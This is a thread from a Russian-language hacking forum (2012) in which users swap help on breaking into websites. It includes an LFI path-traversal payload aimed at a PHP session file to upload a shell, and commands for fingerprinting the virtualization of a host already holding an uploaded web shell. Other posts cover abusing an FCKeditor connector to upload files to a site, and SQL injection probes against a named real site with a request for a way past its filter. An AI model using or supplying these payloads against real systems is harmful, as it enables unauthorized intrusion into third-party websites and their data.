Старый 03.04.2012, 19:28   #1901
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию

Цитата:
Сообщение от Faaax Посмотреть сообщение
LFI
как ещё можно попробовать?
Да и сессия видна
url?..&pid=../../../../../../../var/lib/php5/sess_b18932208801db3cdf5dc69e8a8b60c3/./...
nikp вне форума   Ответить с цитированием
Старый 03.04.2012, 19:32   #1902
kfor
 
Аватар для kfor
 
Регистрация: 27.01.2011
Сообщений: 119
Репутация: 39
По умолчанию

Цитата:
Сообщение от DrakonHaSh Посмотреть сообщение
фиг там - письма к www-data извне не принимаются

а через сам сервак telnet servaddr 25:
...
450 4.7.1 Client host rejected: cannot find your reverse hostname, [123.223.33.35]
нужно попробовать с ip, у которого прописана обратная запись в DNS
кто попробует ?
Да сервер с обратной зоной найти не проблема, но наверно через сессию будет действительно проще
kfor вне форума   Ответить с цитированием
Старый 04.04.2012, 02:09   #1903
Lostnull
 
Регистрация: 15.01.2012
Сообщений: 64
Репутация: 5
По умолчанию

Подниму все таки тему, как определить жертва на впс'е или дедике?
По каким признакам определить openvz,kvm,xen,vmware имея залитый шелл?
p.s. вопрос вообщем к гуру линупса
Lostnull вне форума   Ответить с цитированием
Старый 04.04.2012, 08:50   #1904
SynQ
 
Регистрация: 11.07.2010
Сообщений: 954
Репутация: 352
По умолчанию

Код:
/proc/cpuinfo
dmidecode
dmesg
ls -la /proc/vz /proc/xen
uname -a (смотришь ядро, иногда там встречается *vz* или *stab*, - это все openvz)
Полный список можешь выудить из программы virt-what (лучше исходник почитать, т.к. некоторые вещи оттуда требуют прав рута).
http://people.redhat.com/~rjones/virt-what/
http://git.annexia.org/?p=virt-what.git;a=summary
SynQ вне форума   Ответить с цитированием
Старый 04.04.2012, 09:20   #1905
Faaax
 
Аватар для Faaax
 
Регистрация: 03.04.2012
Сообщений: 95
Репутация: 6
По умолчанию

Цитата:
Сообщение от nikp Посмотреть сообщение
Да и сессия видна
url?..&pid=../../../../../../../var/lib/php5/sess_b18932208801db3cdf5dc69e8a8b60c3/./...
не получилось залиться через сессию
Faaax вне форума   Ответить с цитированием
Старый 04.04.2012, 15:32   #1906
intersecure3207
 
Регистрация: 10.02.2012
Сообщений: 10
Репутация: 0
По умолчанию

краткий вопрос: как найти путь к файлу после заливки через fckeditor, если перебор не эффективен? (и через сайт не найти)

Описание:

Есть сайт,например, site.com в корневой веб-директории лежит fckeditor 2.6.0
в общем site.com/fckeditor/../../../../browser.html?Connector=/.../../../connector.php выдает XML ошибку, то 404, то 0. В общем порывшись в мануалах, т.к. я не могу редактировать конфиг, то дописал &ServerPath=/EXfile/. И в результате файлы стали заливаться, ошибка исчезла, и они стали в файл-манагере отображаться. НО! я ищу залитый файл - хост выдает ошибку 404 файл не найден (заливаю текстовые файлы левые). Они отображаются через файл манагер (и только они), а через веб - не доступны. Причем по идее в этой папке лежат доковские файлы залитые админом, доступные для скачивания. И права на запись есть вроде как.

Вопросы:

1. В общем как найти мной залитые? (путь раскрыл вызвав ошибку)
2. Почему отобрыжаются только залитые мной файлы, а остальные (если это одна и таже директория) нет?
3. Может что-нибудь посоветуете?

Спасибо за ответы.
intersecure3207 вне форума   Ответить с цитированием
Старый 05.04.2012, 13:01   #1907
Agama
 
Регистрация: 05.04.2012
Сообщений: 4
Репутация: 0
По умолчанию

Добрый день. У меня вопрос касательно последнего обновления для CMS Joomla 1.5.26
High Priority - Core - Password Change Vulnerability возможно из-за использование mt_rand(), т.е. уязвимы только все версии работающие на PHP 5.2.0 и ниже? просто хочу убедится, что понимаю верно...
Agama вне форума   Ответить с цитированием
Старый 05.04.2012, 14:18   #1908
Raz0r
 
Аватар для Raz0r
 
Регистрация: 17.07.2010
Сообщений: 100
Репутация: 78
По умолчанию

Цитата:
Password Change Vulnerability возможно из-за использование mt_rand()
из-за вызова mt_srand(), в 1.5.26 его убрали
Цитата:
т.е. уязвимы только все версии работающие на PHP 5.2.0 и ниже
вовсе нет, в PHP 5.2.1 изменилась реализация алгоритма Mersenne Twister, но на подобные уязвимости это никак не влияет.
Raz0r вне форума   Ответить с цитированием
Старый 05.04.2012, 14:33   #1909
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

Помогите составить запрос с выводом. Стоит фильтр или мод_секьюрити, извиняюсь если не прав. Но не могу обойти, пробовал разные варианты. Бросает на 500 Internal Server Error
Уязвимость
Код:
http://www.french-union.com/Menu/detail_visiteur.asp?id=18810+AND+1=1
Код:
http://www.french-union.com/Menu/detail_visiteur.asp?id=18810+AND+1=0
Через order by подобрал кол-во столбцов, 24
Код:
http://www.french-union.com/Menu/detail_visiteur.asp?id=18810+ORDER+BY+24
Буду крайне признателен за помощь, хотелось бы увидеть метод обхода. Облазил всю тему, но ни один вариант применить не получилось.
Consistent вне форума   Ответить с цитированием
Старый 05.04.2012, 15:44   #1910
Lostnull
 
Регистрация: 15.01.2012
Сообщений: 64
Репутация: 5
По умолчанию

Consistent Жесткий фильтр, фильтруются скобки, комментарии и т.д. Не вижу пути обхода.
Lostnull вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot